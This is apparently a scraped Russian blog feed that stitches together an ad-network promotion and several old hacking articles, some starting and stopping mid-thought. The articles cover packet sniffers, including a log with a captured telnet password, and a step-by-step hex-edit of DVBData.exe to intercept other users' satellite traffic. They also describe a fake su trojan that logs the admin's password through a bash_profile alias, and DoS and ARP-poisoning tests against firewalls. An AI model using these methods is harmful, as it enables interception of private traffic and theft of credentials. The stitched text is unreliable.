Основной доход большинства веб-мастеров сегодня получают именно от контекстной рекламы, которая с каждым днем набирает все больше оборотов. Особенность работы с Profit-Partner, в первую очередь, заключается в том, что у них есть система бонусов. Например, если вы заработали первые 1000 рублей, по системе бонусов вам начисляется аналогичное количество баллов. Все эти бонусы можно собирать и потратить в так называемом магазине. Имея в активе немало бонусов, можно будет приобрести разнообразное программное обеспечение и другие товары. Таким образом, приобретение различных вещей происходит фактически без денег, то есть бесплатно. Относительно ассортимента в магазине стоит отметить, что он не ограничиваются простыми товарами. Кроме того. Стоимость всех товаров отличается лояльностью.

В числе товаров, которые предлагаются в магазине Profit-Partner, присутствует: лицензионный софт, антивирусы, операционные системы, домены, электронные и печатные книги, приобретение хостинга за бонусы, создание уникального сайта, работа с платными SEO-сервисами за бонусы, регистрация сайта в Яндекс.Каталоге, реклама и многое другое. Конечно, если вы хотите приобрести что-то действительно ценное, тогда придется немного подождать, пока наберется достаточное количество бонусов на счету. Понятное дело, что это лишь небольшая часть пользы от работ по Profit-Partner. Для пользователя, который впервые заходит на сайт центра обслуживания партнеров, все показано максимально доступно и просто. Главная страница отличается лаконичностью и четким установлением деталей сотрудничества. Большие объемы информации на сайте изложены доступным языком и могут заинтересовать даже простого посетителя.

Если вы, все же, решились на работу с Profit-Partner, тогда вам стоит знать еще некоторые интересные моменты о нем. Все выплаты в центре обслуживания партнеров происходят на пятый рабочий день месяца. Выплаты происходят совершенно без комиссий и с возможностью пополнения сразу нескольких электронных кошельков. Служба поддержки в Profit-Partner заслуживает отдельного внимания, ведь она работает в режиме он-лайн и в любой момент может предоставить качественную консультацию. Кроме того, на сайте можно общаться с посетителями и клиентами через блог и твиттер. Радует то, что Profit-Partner заинтересован не только в профессиональном сотрудничестве, но и в подборе квалифицированного персонала. Как результат, качество сервиса находится на высоком уровне и об этом свидетельствуют многочисленные отзывы партнеров.

Как и во многих компаниях, в Profit-Partner также действует реферальской программа. Согласно ей, каждый партнер, который приведет нового клиента в центр обслуживания партнеров, получит пять процентов от прибыли привлеченных вебмастеров. Многие пользователи активно ищут рефералов, которым также предлагают консультацию в вопросах повышения прибыли в рекламной сети Яндекса. Не менее важным фактором в работе с Profit-Partner является интерфейс. Стоит отметить, что здесь он отличается особенной дружественностью ко всем пользователям. Зарегистрироваться на сайте или добавить свой сайт в рекламную сеть Яндекса не представляет никакой сложности. Кроме того, администрация Profit-Partner постоянно пытается повысить безопасность выплат. Более года назад в центре обслуживания партнеров были введены платежные агенты, которые значительно упрощают финансовые операции. Ни один из платежных агентов не взымает комиссии по выплатам.

Через собственный аканут на Profit-Partner вы можете свободно добавить неограниченное количество сайтов в систему. В случае необходимости вы даже можете получить бесплатный хостинг. Однако это происходит на определенных условиях. Вам предоставится бесплатный хостинг только в том случае, если через год ваш сайт будет работать с Profit-Partner. Подробную информацию можно получить в службе поддержки, которая работает круглосуточно. За пять лет работы центр обслуживания партнеров Profit-Partner показал себя только как качественного и функционального помощника в монетизации сайтов. Те партнеры, которые уже по несколько лет сотрудничают с Profit-Partner, полностью удовлетворены и с радостью принимают все обновления, которые иногда происходят в системе. Для того, чтобы лучше понять, что собой представляет Profit-Partner стоит попробовать поработать с ним. Существует большая вероятность, что вы будете просто поражены простотой работы с Профитом.

Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]> http://suspended.ru/2013/08/918/feed/ 0 http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-292/ http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-292/#comments Thu, 13 May 2010 05:05:40 +0000 http://suspended.ru/?p=600 конецформыначалоформыСнифферы — это проги, которые перехватывают весь сетевой трафик. Снифферы полезны для диагностики сети(для админов) и для перехвата паролей (понятно для кого:)). Например если ты получил доступ к одной сетевой машине и установил там сниффер, то скоро все пароли от их подсети будут твои. Снифферы ставят сетевую карту в прослушивающий режим (PROMISC).То есть они получают все пакеты. В локалке можно перехватывать все отправляемые пакеты со всех машин (если вы не разделены всякими хабами), так как там практикуется широковещание. Снифферы могут перехватывать все пакеты (что очень неудобно, ужасно быстро переполняется лог файл, зато для более детального анализа сети самое оно) или только первые байты от всяких ftp,telnet,pop3 и т.д. (это самое веселое, обычно примерно в первых 100 байтах содержится имя и пароль:)). Снифферов сейчас развелось… Множество снифферов есть как под Unix, так и под Windows (даже под DOS есть:)). Снифферы могут поддерживать только определенную ось (например linux_sniffer.c,который поддерживает Linux:)), либо несколько (например Sniffit, работает с BSD, Linux, Solaris). Снифферы так разжились из-за того, что пароли передаются по сети открытым текстом. Таких служб уйма. Это telnet, ftp, pop3, www и т.д. Этими службами пользуется уйма народу:). После бума снифферов начали появляться различные алгоритмы шифрования этих протоколов. Появился SSH (альтернатива telnet, поддерживающий шифрование), SSL(Secure Socket Layer — разработка Netscape, способная зашифровать www сеанс). Появились всякие Kerberous, VPN(Virtual Private Network). Заюзались некие AntiSniff’ы, ifstatus’ы и т.д. Но это в корне не изменило положения. Службы, которые используют передачу пароля plain text’ом юзаются во всю:). Поэтому сниффать еще долго будут:).
Windows реализации снифферов

CommView — www.tamos.com
Довольно продвинутый сниффер производства TamoSoft. Можно установить свои правила на сниффинг (например игнорировать ICMP, а TCP сниффать, также кроме Internet протоколов имеется поддержка Ethernet протоколов, таких как ARP,SNMP,NOVELL и т.д.). Можно например сниффать только входящие пакеты, а остальные игнорить. Можно указать лог-файл для всех пакетов с лимитов размера в мегах. Имеет две tools’ы — Packet Generator и NIC Vendor Indentifier. Можно посмотреть все подробности посланных /полученных пакетов (например в TCP пакете можно просмотреть Source Port, Destination Port, Data length, Checksum, Sequence, Window, Ack, Flags, Urgent). Радует еще то, что она автоматически устанавливает CAPTURE драйвер. В общем тулза очень полезная для снифа, рекомендую всем.

SpyNet — packetstorm.securify.com
Довольно известный сниффер производства Laurentiu Nicula 2000:). Обычные функции — перехват/декодинг пакетов. Хотя декодинг развит прикольно (можно например по пакетам воссоздавать странички, на которых побывал юзер!). В общем на любителя:).

Analyzer — neworder.box.sk
Analyzer требует установку специального драйвера, вложенного в пакет (packet.inf, packet.sys). Можно посмотреть всю инфу о вашей сетевой карте. Также Analyzer поддерживает работу с командной строкой. Он прекрасно работает с локальной сетью. Имеет несколько утилит: ConvDump,GnuPlot,FlowsDet,Analisys Engine. Ничего выдающегося.

IRIS — www.eeye.com
IRIS продукт известной фирмы eEye. Представляет обширные возможности по фильтрации. Меня в нем сильно порадовало три фишки:
1.Protocol Distribution
2.Top hosts
3.Size Distribution
Также имеется Packet Decoder. Он поддерживает развитую систему логов. А доступные возможности фильтрации превосходят все снифферы обзора. Это Hardware Filter, который может ловить либо все пакеты (Promiscious), либо с различными ограничениями (например захватывать только multicast пакеты или broadcast пакеты, либо только Mac фреймы). Можно фильтровать по определенным MAC/IP адресам, по портам, по пакетам, содержащим определенные символы. В общем неплохой сниффак. Требует 50comupd.dll.

WinDUMP
Аналог TCPdump for Unix. Этот сниффак действует через командную строку и представляет минимальные возможности по конфигурации и еще требует библиотеку WinPcap. Мне не очень…

SniffitNT
Тоже требует WinPcap. Работа только как командной строкой, так и в интерактивном режиме. Со сложными опциями. Мне не очень.

ButtSniff
Обычный пакетный сниффер созданный известнейшей группой CDC(Cult of the Dead Cow). Фишка его в том, что его можно использовать, как плагин к BO:)(Очень полезно:)).Работа из командной строки.

Существуют еще множество снифферов, таких как NatasX, NetXRay, CooperSniffer, LanExplorer, Net Analyzer и т.д. Пойдем дальне…

Unix’овые снифферы

Все снифферы данного обзора можно найти на packetstorm.securify.com.

linsniffer
Это простой сниффер для перехвата логинов/паролей. Стандартная компиляция (gcc -o linsniffer linsniffer.c).
Логи пишет в tcp.log.

linux_sniffer
Linux_sniffer требуется тогда, когда вы хотите детально изучить сеть. Стандартная компиляция. Выдает всякую шнягу дополнительно, типа isn, ack, syn, echo_request (ping) и т.д.

Sniffit
Sniffit — продвинутая модель сниффера написанная Brecht Claerhout. Install(нужна libcap):
#./configure
#make
Теперь запускаем сниффер:
#./sniffit
usage: ./sniffit [-xdabvnN] [-P proto] [-A char] [-p port] [(-r|-R) recordfile]
[-l sniflen] [-L logparam] [-F snifdevice] [-M plugin]
[-D tty] (-t | -s) | (-i|-I) | -c]
Plugins Available:
0 — Dummy Plugin
1 — DNS Plugin

Как видите, сниффит поддерживает множество опций. Можно использовать сниффак в интерактивном режиме. Сниффит хоть и довольно полезная прога, но я ей не пользуюсь. Почему? Потому что у Sniffit большие проблемы с защитой. Для Sniffit’a уже вышли ремоутный рут и дос для линукса и дебиана! Не каждый сниффер себе такое позволяет:).

HUNT
Это мой любимый сниффак. Он очень прост в обращении, поддерживает много прикольных фишек и на данный момент не имеет проблем с безопасностью. Плюс не особо требователен к библиотекам (как например linsniffer и Linux_sniffer). Он может в реальном времени перехватывать текущие соединения и под чистую дампить с удаленного терминала. В общем, Hijack rulezzz:). Рекомендую всем для усиленного юзания:).
Install:
#make
Run:
#hunt -i [interface]

READSMB
Сниффер READSMB вырезан из LophtCrack и портирован под Unix (как ни странно:)). Readsmb перехватывает SMB пакеты.

TCPDUMP
tcpdump — довольно известный анализатор пакетов. Написанный еще более известным челом — Вэн Якобсоном, который придумал VJ-сжатие для PPP и написал прогу traceroute (и кто знает что еще?). Требует библиотеку Libpcap.
Install:
#./configure
#make
Теперь запускаем ее:
#tcpdump
tcpdump: listening on ppp0
Все твои коннекты выводит на терминал. Вот пример вывода на пинг
ftp.technotronic.com:
02:03:08.918959 195.170.212.151.1039 > 195.170.212.77.domain: 60946+ A?
ftp.technotronic.com. (38)
02:03:09.456780 195.170.212.77.domain > 195.170.212.151.1039: 60946* 1/3/3 (165)
02:03:09.459421 195.170.212.151 > 209.100.46.7: icmp: echo request
02:03:09.996780 209.100.46.7 > 195.170.212.151: icmp: echo reply
02:03:10.456864 195.170.212.151 > 209.100.46.7: icmp: echo request
02:03:10.906779 209.100.46.7 > 195.170.212.151: icmp: echo reply
02:03:11.456846 195.170.212.151 > 209.100.46.7: icmp: echo request
02:03:11.966786 209.100.46.7 > 195.170.212.151: icmp: echo reply
В общем, снифф полезен для отладки сетей, нахождения неисправностей и т.д.

Dsniff
Dsniff требует libpcap, ibnet, libnids и OpenSSH. Записывает только введенные команды, что очень удобно. Вот пример лога коннекта на unix-shells.com:

02/18/01 03:58:04 tcp my.ip.1501 -> handi4-145-253-158-170.arcor-ip.net.23
(telnet)
stalsen
asdqwe123
ls
pwd
who
last
exit

Вот dsniff перехватил логин с паролем (stalsen/asdqwe123).
Install:
#./configure
#make
#make install

Защита от снифферов

Самый верный способ защиты от снифферов — использовать ШИФРОВАНИЕ (SSH, Kerberous, VPN, S/Key, S/MIME, SHTTP, SSL и т.д.). Ну а если не охота отказываться от plain text служб и установления дополнительных пакетов:)? Тогда пора юзать антиснифферские пекеты…

AntiSniff for Windows
Этот продукт выпустила известная группа Lopht. Это был первый продукт в своем роде. AntiSniff, как сказано в описании:
«AntiSniff is a Graphical User Interface (GUI) driven tool for detecting promiscuous Network Interface Cards (NICs) on your local network segment». В общем, ловит карты в promisc режиме. Поддерживает огромное количество тестов (DNS test, ARP test, Ping Test, ICMP Time Delta Test, Echo Test, PingDrop test). Можно сканить как одну машину, так и сетку. Здесь имеется поддержка логов. AntiSniff работает на win95/98/NT/2000, хотя рекомендуемая платформа NT. Но царствование его было недолгим и уже в скором времени появился сниффер под названием AntiAntiSniffer:), написанный Майком Перри (Mike Perry) (найти его можно по адресу www.void.ru/news/9908/snoof.txt).Он основан на LinSniffer (рассмотренный далее).

Unix sniffer detect:
Сниффер можно обнаружить командой:
#ifconfig -a
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:3924 Metric:1
RX packets:2373 errors:0 dropped:0 overruns:0 frame:0
TX packets:2373 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0

ppp0 Link encap:Point-to-Point Protocol
inet addr:195.170.y.x P-t-P:195.170.y.x Mask:255.255.255.255
UP POINTOPOINT PROMISC RUNNING NOARP MULTICAST MTU:1500 Metric:1
RX packets:3281 errors:74 dropped:0 overruns:0 frame:74
TX packets:3398 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:10

Как видите интерфейс ppp0 стоит в PROMISC mode. Либо оператор загрузил снифф для проверки сети, либо вас уже имеют… Но помните, что ifconfig можно спокойно подменить, поэтому юзайте tripwire для обнаружения изменений и всяческие проги для проверки на сниффы.

AntiSniff for Unix.
Работает на BSD, Solaris и Linux. Поддерживает ping/icmp time test, arp test, echo test, dns test, etherping test, в общем аналог AntiSniff’а для Win, только для Unix:).
Install:
#make linux-all

Sentinel
Тоже полезная прога для отлова снифферов. Поддерживает множество тестов. Проста в использовании.
Install : #make
#./sentinel
./sentinel [method] [-t ] [options]
Methods:
[ -a ARP test ]
[ -d DNS test ]
[ -i ICMP Ping Latency test ]
[ -e ICMP Etherping test ]
Options:
[ -f ]
[ -v Show version and exit ]
[ -n ]
[ -I ]

Опции настолько просты, что no comments.

MORE

Вот еще несколько утилит для проверки вашей сети(for Unix):
packetstorm.securify.com/UNIX/IDS/scanpromisc.c -ремоутный детектор PROMISC mode для ethernet карт (for red hat 5.x).
http://packetstorm.securify.com/UNIX/IDS/neped.c — Network Promiscuous Ethernet Detector (нужно libcap & Glibc).
http://packetstorm.securify.com/Exploit_Code_Archive/promisc.c -сканирует девайсы системы на детект сниффов.
http://packetstorm.securify.com/UNIX/IDS/ifstatus2.2.tar.gz — ifstatus тестит сетевые интерфейсы в PROMISC mode.

Внимание! Цель данной статьи — рассмотреть возможность перехвата информации в спутниковых сетях и варианты защиты. Автор не несет ответственности за возможное применение полученной информации из статьи в противозаконных целях. Данная технология описана для общего развития, но ни как руководство к действию.
Атака

Для начала давайте разберемся, каким образом информация передается по спутниковым каналам связи. Система основана на том, что клиентский компьютер по наземным каналам связи передает запрос в дата центр на получение какой либо информации из Интернета. В датацентре запрос обрабатывается и он загружает все по тем же наземным каналам связи информацию, которую запросил клиент. Далее из датацентра информация идет на транспондер, в задачи которого входит передать информацию на спутник. Вот тут и открывается истина — задача спутника сродни задаче зеркала — просто отражать полученный сигнал — т. е. все, что приходит от транспондера спутник просто отправляет опять на землю, но уже не в виде узкого пучка, как лазер, а более расширено — как свет от фонарного столба, чем он выше — тем больше снизу световое пятно.

Что же у нас получается — спутник рассеял нашу информацию по огромной поверхности нашей планеты, как же мы ее получим?

Здесь в роль вступает DVB карточка и тарелка. Так как сигнал со спутника приходит к нам уже с довольно низким потенциалом — его необходимо усилить. Для этого нам и нужна тарелка, и чем она больше — тем лучший сигнал мы получим. Тарелка всего лишь отражает сигнал на конвертер, который уже и является непосредственно самим приемником сигнала. Но сигнал недостаточно просто принять — его надо отфильтровать. Ведь в один момент времени в сигнале может находиться информация, которую запросили, например, 100 человек. DVB карта фильтрует сигнал, полученный конвертером, и оставляет нам только то, что запросили мы и отсекает то, что запросил сосед. Как видно из всей этой цепочки — самый уязвимый элемент системы состоит в том, что данные разделяются на клиентской стороне. Вот этим мы и воспользуемся.

Что нам надо сделать для получения сторонней информации? Правильно — сделать так чтоб наша DVB карточка, фильтровала чуть-чуть не так, как задумал производитель. Фильтрация происходит по нескольким параметрам — по MAC-адресу DVB карточки или же по IP-адресу. Настройка фильтрации производится в сопутствующей программе для спутникового Интернета, например – DVBData из комплекта TTBudget-1401.

Как было уже сказано выше, непосредственно фильтрацию производит не сама карточка, а ее софт — тот самый, который мы запускаем при подключении к Интернету используя спутник. И именно его, мигающего нам зеленым цветом в трее при хорошем сигнале, мы и будем эксплуатировать (на примере DVBData от TTBudget — 1401).

После непродолжительного изучения работы и алгоритма DVBData.exe, была найдена возможность (простой заменой некоторых строк в исполняемом файле) заставить фильтр работать на нас. По умолчанию DVBData.exe не фильтрует так называемые multicast пакеты, которые рассылает провайдер спутникового Интернета. В multicast пакетах может быть и техническая информация, а может быть и программа передач. Но не столь важно, что может быть в этих multicast – главное, что фильтруются они по MAC-адресам, которые жестко прописаны в DVBData.exe. И если в самой программе изменить эти адреса – то мы заставим DVB карточку пропускать через себя абсолютно любые пакеты с произвольным MAC-адресом, вместо multicast.

Для этого откроем в любимом HEX редакторе DVBData.exe и поменяем все 10 адресов по смещению 72168h вида 01005E000008 на мак адрес карточки, информацию с которой нам надо получить. После изменения адресов сохраняем наш измененный файл под именем DVBData2.exe и копируем его в тот же каталог, что и оригинал.

И вот настал самый интересный момент — нам осталось направить нашу тарелку на тот же самый спутник, что и у нашего коллеги. Запустить наш модифицированный DVBData2.exe. И с удовольствием наблюдать, как в трее начинает мигать значок сетевого подключения — теперь информация, которую запросил наш друг, приходит и к нему и к нам!

Но что с того, что к нам приходят посторонние пакеты — мы то от этого ничего кроме загрузки процессора не получаем. Нам надо весь приходящий трафик куда-то сохранять и анализировать. Для этой цели прекрасно подходит сетевой анализатор Ethereal. В его задачи будет входить сохранение всех полученных пакетов в файл и дальнейший их анализ.

Итак, после установки запускаем наш анализатор. И активируем захват сетевого интерфейса нашей DVB карточки в меню Capture. Далее запускаем наш модифицированный DVBData2.exe. И вот они побежали — наши мегабайты информации. Стоит, пожалуй, еще напомнить, что при запуске DVBData2.exe нам нужно будет еще указать PID – это номера потоков. Их можно узнать на сайте провайдера или просто вписать все активные пиды, которые предоставит нам программа PidScanner. После непродолжительной работы всего нашего спец-софта захват можно прекратить и сохранить к себе на диск весь поток информации, который мы заполучили.

Теперь осталось в том же самом Ethereal открыть наш сохраненный поток данных. И уже не спеша, попивая чай или кофе, брать ту информацию, ради которой мы не пожалели потратить столько времени на настройку тарелки, ремонт ПО спутниковой карточки, установку Ethereal и, конечно же, на прочтение этой статьи.
Защита

Единственный способ защитится от прослушивания во время использования спутникового Интернета — шифрование всего трафика криптостойким алгоритмом. Никогда не используйте спутниковый Интернет для получения личной и особо ценной информации.

Различные вопросы и решения, которые могли возникнуть.

Вопрос: что можно перехватить таким методом?

Ответ: абсолютно весь входящий трафик. Т.е и Интернет странички, и почту, и аську, и все остальное.

Вопрос: как узнать мак адрес посторонней DVB карточки?

Ответ: для этого есть несколько способов. Первый и самый простой — просто спросить его у нашего коллеги. Если просто спросить нельзя — можно воспользоваться СИ. Ну а самый шпионский вариант – это использование спутниковых программ-граберов, например manna.

{
заголовок_HTTP_запроса (n bytes),
сигнатура «ХАКЕР» (5 bytes),
длина заголовка (2 bytes),
заголовок хакерского пакета (n bytes),
длина пакета (2 bytes),
данные (n byte);
}

При нахождении такового пакета из его хакерского заголовка вытаскиваются необходимые поля (например имя передаваемого файла и номер передаваемого куска) и сами данные. Вуаля! Данные у хакера, а за входящий трафик платит хозяин MyHOST…

Теперь встает вопрос «Как от этого защищаться».

Если учесть, что длина Ethernet-пакета не зависит от того, сколько байт из него будет принято сервисом на машине-получателе, то ограничением длинны принимаемого TCP-запроса мы ничего не добьемся. Огромное количество открытых для всех proxy-серверов говорит о том, что наш непосредственный провайдер не сможет их все зафильтровать.

Итого вывод — что бы такого не приключилось надо менять концентратор здания (тот самый хаб) на коммутатор (свич) и молить Аллаха, чтобы наш хакер не знал как этот свич обмануть (что возможно).

PS: Вышеописаный метод был проверен лично мной — работает

PPS: Может подарить моему провайдеру свич?

и обзывается su.c. Если вглядеться в простенький код можно понять, что это полная имитация /bin/su, только с логированием пароля в файл tmp/.screen. Сам бинарник будет находиться в файле tmp/.screen_active (все пути относительно домашнего каталога пользователя). После того, как файл выполнится он замещается стандартным /bin/su. Таким образом, админ думает, что ошибся паролем, так как со второй попытки суид будет успешным.
Перед тем, как проверять данный метод на практике, впиши строчку “alias su /home/user/tmp/.screen_active в файл ~/.bash_profile и жди, пока админ решит суиднуться на рута. Когда это произойдет – пароль твой ;).

Данный метод работает лишь тогда, когда юзер регулярно суидиться на рута, а у хакера есть доступ к этому аккаунту (либо ко всей системе).
10. Стандартный способ.
И, наконец, настало время рассказать про самый тривиальный способ. Хакер захватывает систему и получает доступ к /etc/shadow. Далее, все по сценарию – берется расшифровщик, хороший словарь и вся надежда только на удачу. Я думаю, ты не раз сталкивался с применением этого метода. И, что интересно, постоянно забывал об остальных 9…

1. Безобразие начинается
2. Подопотные
3. Обещания разработчиков
4. Флудим
5. SYN
- ICMP
- IGMP
- UDP
6. Нюкаем
7. Эксплоиты
8. Прослушиваем
9. Сканим
10. Отключаем
11. Кто здесь Лидер?

Посмотрим же как реализуют себя стенки в защите вашего любимого компа. Сейчас мы будем их жестоко тестить на предмет противодействия различным видам сетевых атак. Выясним же, кто действительно стоит того, чтобы занимать достойное место в системе, защищая её от всяческих напастей; а кто — разрекламированный друшлаг.

Заниматься мы будем простейшим и в то же время важнейшим делом — валить систему в синий экран всеми доступнымии способами. Вот щас и выясним — кто тут лидер ))).

А если говорить интелегентно — мы будем испытывать фаерволы на предмет противодействия атакам, вызывающим отказ в обслуживании,.. и не только.
Предполагается начальные знания читателя основы ТСР\!Р протокола, а также некоторого хакерского опыта smile.gif .

Итак, мы имеем:

1. Винда ХРеновая\SamPostavil_2, пропатченная под завязку.
2. Фаерволы популярные:
- Kaspersky AntiHacker v.1.7.130
- OutpostPro_v3.0.543.431 RUS Final
- ZoneAlarm_PRO_60.667
2. Четыре вида флудеров: SYN, ICMP, IGMP, UDP.
3. Вагон нюкеров с маленькой тележкой: WinNuke, SmbDie, Fragmentation….
4. Три самых популярных масдайных эксплоита\червя: LoveSun, Sasser, Messenger, UP&P.
5. Снифер, крутой и професиональный.
6. Сканер портовый, многофункциональный.
7. Мозг — воспалённый, руки — выпрямленные smile.gif

Замечу что производители этих фаерволов обещали защищать нас конкретно от:

1. Kaspersky AntiHacker v.1.7.130

* Ping of Death- Эта атака состоит в отправке на ваш компьютер ICMP — пакета, размер которого превышает допустимое значение в 64 КБ. Эта атака может привести к аварийному завершению работы.
* Land — Эта атака заклюсается в отправке на ваш компьютер большого количества запросов на установку соединения с самим собой. Атака приводит к тому, что компьютер не реагирует на другие попытки установить соединения.
* Сканирование TCP-портов — Эта атака заключается в попытке определить открытые TCP-порты на вашем компьютере. Атака используется для поиска слабых мест и предшествует более опасным атакам.
* Сканирование UDP-портов — Эта атака заключается в попытке определить открытые UDP-порты на вашем компьютере. Атака используется для поиска слабых мест и предшествует более опасным атакам.
* SYN-Flood — Эта атака заключается в отпраке на ваш компьютер большого кол-ва запросов на установку соединения. Атака приводит к тому, что компьютер не реагирует на другие попытки установить соединения.
* UDP-Flood — Эта атака заключается в отправке специальных UDP-пакетов, которые бесконечно пересылаються между атакованными компьютерами. В результате атаки тратяться ресурсы компьютеров и загружается центральный процессор.
* ICMP-Flood — Эта атака заключается в отправке большого кол-ва ICMP-пакетов на ваш компьютер. Атака приводит к большому росту загрузки процессора в силу реагирования на каждый пакет.
* Helkern — Эта атака заключается в в отпраке на ваш компьютер UDP-пакетов специального вида, способных выполнить вредоносный код. Атака приводит к замедлению работы в интернете.
* SmbDie — Эта атака заключается в попытке установить соединение с вашим компьютером по SMB-протоколу, в случае успеха на компьютер отправляется пакет особого вида, который пытаеться переполнить буфер. Атаке подвержены ОС Windows 2k\XP\NT.
* Lovesan — Эта атака заключается в попытке обнаружения на вашем компьютере бреши в сервисе DCOM_RPC операционной системе Windows и пересылке вредоносной программы с её использованием, которая потенциально позволит производить любые манипуляции на вашем компьютере.

2. OutpostPro_v3.0.543.431 RUS Final

* Сканирование порта — атакующий запрашивает TCP и UDP порты Вашей системы, чтобы определить к какому порту он может подсоединиться, чтобы получить контроль.
* Denial of Service — Большое кол-во данных посылается на порт вашей системы при попытке вызвать ошибку или зависание системы.
* Fragmented ICMP — пакет ICMP, посланный в виде фрагментов, превышает 1472 байта после сборки. Это может привести к сбоям в стеке TCP и зависанию системы.
* Fragmented IGMP — пакет IGMP, посланный в виде фрагментов, превышает 1472 байта после сборки. Это может привести к сбоям в стеке TCP и зависанию системы.
* Short fragments — Пакет разбивается на несколько фрагментов, которые затем изменяються таким образом, что после сборки пакет приводит к зависанию системы.
* Teardrop — ещё один вид Short fragments атаки.
* My Address — Атака, состоящая в перехвате IP — адреса Вашей системы, имитации системы в сети и захвате всех соединений.
* Перекрывающиеся фрагменты — Пакет разбивается на несколько фрагментов , которые затем изменяються таким образом, что накладываються друг на друга и вызывают зависание системы из-зи ошибок памяти.
* WinNuke — Источник проблемы состоит в уязвимости протокола TCP, приводящей к зависанию некоторых версий операционных систем Windows при получении специфических пакетотв.
* Nestea — опасное перекрытие IP — пакетов, вызываемое программой Nestea, может привести к нестабильности и зависанию системы.
* Iseping — Большой ICMP пакет разбивается на большое число фрагментов. После сборки приводит к зависанию системы.
* ICMP атака — TCP\IP стек Windows некорректно обрабатывает фрагментированные ICMP-пакеты. Система, получившая такой пакет, с большой вероятностью, зависнет.
* Opentear — программа Opentear использует фрагментированные UDP-пакеты, чтобы подвергнуть компьютер жертвы перезагрузке.
* Nuke — Попытка захватить TCP-соединение и обойти брандмауэр и другие системы обнаружения атак.
* IGMP атака — TCP\IP стек Windows некорректно обрабатывает фрагментированные IGMP-пакеты. Система, получившая такой пакет, с большой вероятностью, зависнет.
* Port139 — Фрейм с нулевым полем имени, который может привести системы Windows 95 или 98 к нестабильному состояниюили зависанию.
* Неверное поле IP Options — атака использует переполнение буфера стэка TCP\IP (когда размер поля IP Options превышает 38 байт) для выполнения вредоносного кода на вашем компьютере.
* Атака RPC DCOM — Различные черви и утилиты используют RPC_DCOM — уязвимость, что может привести к выполнению злонамеренного кода и падениям системы.
* Отравление ARP-кеша — опасная атака направленная на перехват трафика.

3. ZoneAlarm_PRO_60.667

* Детектора атак нету
* Зато защита ARP-кэша есть
* А остальное надо ручками настраивать, ибо фаервол очень серьёзный.

Итак, приступим. Выставим фаерволам вот такие режимы. Для Касперского — это «Высокий». Для Аутпоста — «Блокировать». А вот Мистер Аларм на высоком уровне защиты блокировал ВСЕ мои домогательства (можно считать его вне конкуренции и лидером в области высокого уровня запрета), поэтому, чтоб было интересней, я его перевёл в средний режим тревожности.

Начнём сначала, испытывая флудеры:

* SYN-флудер
*Без фаервола система падала секунд за 10.
*Касперский, как положено, опознал атаку и заблокировал айпи негодяя, однако процессор всё равно грузился (?). Какого.. ! Видимо, приоритет загруженного драйвера фаервола стоит на равном (или ниже) виндового, в чем я так же убедился на других атаках. Это вери бэд, ибо по сути должного противодействия атаке не оказывается. Это означает, что если атакующих будет двое или более — системе пипец.
*Аутпост не опознал атаку(замечу, что опознание флуд-атак в него не заложено!!!), и загрузка процессора была вдвое больше.
*Аларм молчал (детектора атак у него вообще нет), однако каким-то чудом не давал процессору загружаться. Хм.. может флудер не правильный?..
* ICMP-флудер
*Касперский определяет флуд… и всё равно грузит проц.
*Аутпост даже при стандартных настройках режет ICMP по самое не балуйся. Урезав всё вручную и оставив только необходимое он превратился в настоящую ICMP-крепость, которой до такого флуда просто пофиг. Респект.
*Аларм был настроен на фильтрацию этих пакетов. Атака провалена.
* IGMP-флудер
*Без фаервола процессор грузился на 100%, однако система была работоспособна(приоритет IGMP низок).
*Касперский не знает ничего об IGMP вообще и молчал. Процессор на 80%.
*Outpost при первом включении обычно спрашивает, разрешать ли обработку IGMP. Нах. И так как IGMP был просто запрещен, проц — 50%.
*Аларм был настроен на фильтрацию пакетов. Проц 35%.
* UDP-флудер
*Без фаерволов проц на 100%(приоритет удп выше чем тср) , система жутко тормозила, но (я оч удивлен) всё же выжила.
*Касперский, как обычно всё распознал… и продолжал грузить процессор )))
*Аутпост каким то неизвестным образом умудрялся противостоять натиску без блокировки.
*Аларм как обычно молчал, не давая мне ни шанса ($ly ..!!!).

Теперь по-нюкаем

*Касперский опознал лишь LAND атаку — пожалуй единственную, которой подвержена ХР. Вобщем то можно сказать, что ставить фаервол от дяди каспера можно только на пропатченную ХР, так как если б это была другая винда — она свалилась бы без вопросов.
*Аутпост как и было обещано опознал многие типы нюкеров. А вот с LAND как раз не справился.
*По причине отсутствия детектора атак, Алармик был безмолвен. Если его ставить на старую систему, есть реальный шанс свалить её, при условии достаточно демократичных настроек фаервола.

Эксплоиты

Ну с DCOM’ом и Lsass’ом как оказалось, был знаком KAV и Outpost. А вот остальные сплоиты они видели явно впервые ) А ещё говорят, что если слегка переписать код эксплоита, то его ваще никто не замечает…

Снифер — тест

Теперь заценим новую фичу Аутпоста — защиту от отравления арп-кэша. Берём специальный снифер и травим кэш жертвы. Вот, без фаервола ВЕСЬ трафик между сервером и жертвой пошел через нас. А из него мы можем легко выловить пароли. Включаем Аутпост — тревожная табличка и все хакеры идут лесом ))).
А так же обратим внимание на встроенный в Аутпост антиспайвэа-модуль, который призван находить в вашей системе разных шпионов. Фича полезная. Определила 3 из 3-х запущенных шпионских паблик-прог.
Про огромную гору фишек в Аларме я рассказывать устану. Там их дофигища. Защита АРП-кэша имеется.

Сканим порты.
Ну теперь — самое любимое ))

При сканировании нескольких портов каждый фаер сразу опознавал нарушителя, независимо от типа сканирования.

Теперь усложним задачу. Кто мешает нам посканить один порт? Прально. А если удасться, то через секунд 10 можно просканить и ещё один, и ещё…
Сканить будем в два этапа. Оба — стелс-сканирование, первое поверхностное, второе — углубленное.

Скажу, что на поверхностном удалось просканить всех.

*Касперский показал неплохой результат, заблокировав хакера при начале углубленного скана.
*Аутпост при стандартных настройках сканиться просто на ура. Однако слегка поднастроив детектор атак он показал отличный результат.
*Аларм ничего не стал скрывать и устроил моему сканеру чистосердечное признание, сдав систему и сервисы с потрохами smile.gif))

Отключаем

